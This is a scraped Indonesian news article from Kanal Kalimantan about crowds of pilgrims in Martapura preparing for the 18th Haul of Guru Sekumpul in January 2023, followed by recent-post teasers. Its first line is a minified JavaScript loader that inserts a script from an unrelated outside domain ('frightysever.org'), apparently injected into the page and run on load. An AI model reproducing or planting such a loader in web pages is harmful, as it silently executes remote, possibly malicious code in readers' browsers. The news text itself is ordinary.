(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Banjar

Jelang Puncak Haul Guru Sekumpul, Ribuan Jemaah Menggelar Sajadah


KANALKALIMANTAN.COM, MARTAPURA – Ribuan jemaah padati gerbang kediaman Gubernur Kalsel, H Sahbirin Noor di Kampung Keramat Kecamatan Martapura Timur, jelang puncak Haul Akbar ke-18 KH Muhammad Zaini bin Abdul Ghani (Guru Sekumpul) pada Kamis (26/1/2023) petang.

Kabarnya sekira pukul 20.30 Wita kegiatan haul akbar akan dimulai dengan agenda Maulid Habsy.

Para relawan yang terdiri dari Satpol PP hingga Banser turut mengamankan dan mengarahkan para jemaah yang akan memasuki titik utama kegiatan haul.

Salah seorang personil Banser, M Tanwir mengatakan, saat memasuki lokasi haul para jemaah diwajibkan untuk mendaftarkan identitas terlebih dahulu untuk mendapatkan kartu akses untuk keluar dan masuk area.

 

Baca juga : Rapat Paripurna di DPRD Lamandau, Ini Kata Bupati Terkait Dua Raperda

“Para jemaah harus daftar dulu bawa KTP agar bisa mendapatkan id card untuk keluar masuk lokasi haul, dan laki-laki perempuan pun dibedakan pemeriksaannya,” ujar salah seorang personil Banser, M Tanwir saat diwawancarai di sela sela mengatur para jemaah.

Diketahui saat memasuki lokasi juga, para jemaah harus melalui rute pengecekan barang bawaan dan pengecekan protokol kesehatan.

Sementara itu untuk syaf atau tempat kedudukan jemaah laki-laki dan perempuan dibedakan. Yakni laki-laki berada di syaf depan tepat di depan panggung. Sedangkan syaf untuk jemaah perempuan berada di belalang samping kediaman Gubernur Kalsel.

“Khusus untuk jemaah perempuan, setelah mendaftar diharapkan membelokan posisinya di sebelah kediaman Gubernur karena syaf nya berada di sana,” sebutnya.

Baca juga  : Haul Sekumpul di Kampung Keramat, Barang Bawaan Diperiksa, Rantis TNI Diturunkan

Sementara itu terpantau di sepanjang Jalan Martapura Lama hingga Jalan Makam ribuan jemaah pejalan kaki sudah memadati jalan.

Tepat di pinggir jalan itupun para jemaah mengampar tikar dan sajadahnya untuk bersiap-siap melakukan sholat magrib berjamaah.

Tanwir juga menjelaskan bahwa, para jemaah itu sudah memadati jalan dan memasuki titik lokasi haul sejak selepas dzuhur siang tadi.

“Dari siang tadi sudah banyak jemaah yang datang kebanyakan dari luar daerah,” pungkas Tanwir. (Kanalkalimantan.com/wanda)

Reporter : wanda
Editor : cell


Desy Arfianty

Recent Posts

Ungkap Kasus Curanmor di Banjarbaru, 4 Unit Motor Berplat Merah

7 Pelaku Ditangkap dengan Barbuk 21 Unit Sepeda Motor Read More

1 jam ago

Kontestan Kepala Daerah di Kalsel Ditantang Miliki Visi Majukan Perpustakaan

KANALKALIMANTAN.COM, BANJARMASIN - Tim Tenaga Ahli Gubernur Kalimantan Selatan (Kalsel) melakukan kunjungan ke Dinas Perpustakaan… Read More

3 jam ago

Instansi Vertikal Disiapkan Masuk SKPD Instansi Mengajar di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Dinas Pendidikan (Disdik) Kota Banjarbaru siap menggandeng instansi vertikal di Kota Banjarbaru,… Read More

4 jam ago

780 Anggota PPK se Kalsel Dilantik, Bertugas 8 Bulan

KANALKALIMANTAN.COM, BANJARBARU - Seluruh Panitia Pemilihan Kecamatan (PPK) di Provinsi Kalimantan Selatan (Kalsel) resmi dilantik… Read More

4 jam ago

25 Anggota PPK Kota Banjarbaru Dilantik, Langsung Bekerja Membentuk Sekretariat

KANALKALIMANTAN.COM, BANJARBARU - Komisi Pemilihan Umum (KPU) Kota Banjarbaru resmi melantik 25 orang anggota Panitia… Read More

7 jam ago

Kearifan Lokal Kalsel Harus Dibaca dan Ditulis Generasi Muda

KANALKALIMANTAN.COM, BANJARMASIN - Dinas Perpustakaan dan Kearsipan Provinsi Kalimantan Selatan (Kalsel) menggelar acara sosialisasi budaya… Read More

19 jam ago

This website uses cookies.